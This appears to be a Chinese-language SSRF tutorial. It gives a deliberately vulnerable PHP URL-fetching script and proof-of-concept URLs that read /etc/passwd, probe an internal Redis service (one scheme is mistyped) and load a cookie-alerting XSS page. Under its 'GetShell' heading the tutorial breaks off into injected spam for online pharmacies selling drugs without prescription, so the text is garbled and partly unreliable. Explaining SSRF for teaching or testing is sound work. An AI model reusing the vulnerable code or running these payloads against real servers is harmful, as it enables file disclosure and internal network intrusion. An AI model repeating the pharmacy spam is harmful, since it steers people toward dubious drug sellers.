SSRF
漏洞介绍
SSRF(Server-Side Request Forgery, 服务端请求伪造)利用漏洞可以发起网络请求来攻击内网服务。
利用SSRF能实现以下效果:
1.扫描内网(主机信息收集,Web应用指纹识别)
2.根据所识别应用发送构造的Payload进行攻击
3.Denial of service等等


支持的协议如下:
file:///
dict://
sftp://
ldap://
tftp://
gopher://
漏洞危害
DemoCode
<?php
$url = $_GET['url'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($curl);
curl_close($curl);
print_r($response);
本地任意文件读取(Arbitrary File Read)

POC:https://www.*.*/ssrf.php?url=file:///etc/passwd
内网服务嗅探(Disclosure of Information)
这里以嗅探redis举例
POC:https://www.*.*/ssrf.php?url=ditc://192...*:6379/info

跨站脚本攻击(Cross Site Scripting)
POC:https://www.*.*/ssrf.php?url=http://172.18.55.171/xss.php
这里不局限于xss,用xss举例.本地xss.php如下
<?php
print_r("<script>alert(document.cookie)</script>");
GetShell
bestpharmacyonline.com
https://canadianpharmacieshelp.com/
overseas pharmacies shipping to usa
discount canadian drugs
no prescription pharmacies
cheap medications
canadian online pharmacies 2017
online canadian pharmacy
https://canadianpharmacyeasy.com/
online drugstore
online pharmacy no rx required